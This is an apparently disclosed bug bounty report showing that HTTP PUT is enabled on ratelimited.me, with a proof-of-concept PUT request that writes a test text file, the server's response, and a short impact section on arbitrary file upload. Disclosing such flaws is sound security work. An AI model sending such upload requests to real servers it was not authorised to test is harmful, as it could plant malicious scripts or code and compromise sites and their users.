HTTP PUT method is enabled ratelimited.me
Discovered by codeslayer137 on Ratelimited

This issue took No information to triage and 0 Days and 4 hours to resolve once triaged.



Found that the HTTP PUT method is enabled on the web server. I tested writing the file /codeslayer137.txt to the server using the PUT verb, and the contents of the file were then retrieved using the GET verb. The following is the PoC:

Request:

PUT /codeslayer137.txt HTTP/1.1
Host: ratelimited.me
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Connection: close
Cookie: __cfduid=dfa5166b2ed63c2a5078df85a46ec5e941548497323; fs_uid=rs.fullstory.comHCE075768820354449408:5743114304094208; cookieconsent_status=dismiss; mp_9e50b60442d3361880f79100f15e5aac_mixpanel=%7B%22distinct_id%22%3A%20%2216889a21237498-0766105008d6a5-12666d4a-e1000-16889a212387c%22%2C%22%24device_id%22%3A%20%2216889a21237498-0766105008d6a5-12666d4a-e1000-16889a212387c%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 27 Jan 2019 00:07:53 GMT
Content-Length: 21

Testing CodeSlayer137

Response:

HTTP/1.1 200 OK
Date: Tue, 29 Jan 2019 08:24:15 GMT
Content-Type: text/plain
Content-Length: 0
Connection: close
Accept-Ranges: bytes
Content-Security-Policy: block-all-mixed-content
Etag: "be3b22647a7d52f2f662109652e629fc"
Vary: Origin
X-Amz-Request-Id: 157E4426C0B3D211
X-Minio-Deployment-Id: ebc7a0d8-9f47-4bdb-92ee-4a9cbbd3ec48
X-Xss-Protection: 1; mode=block
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4a0a4d20791f31a4-SIN

Impact

The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.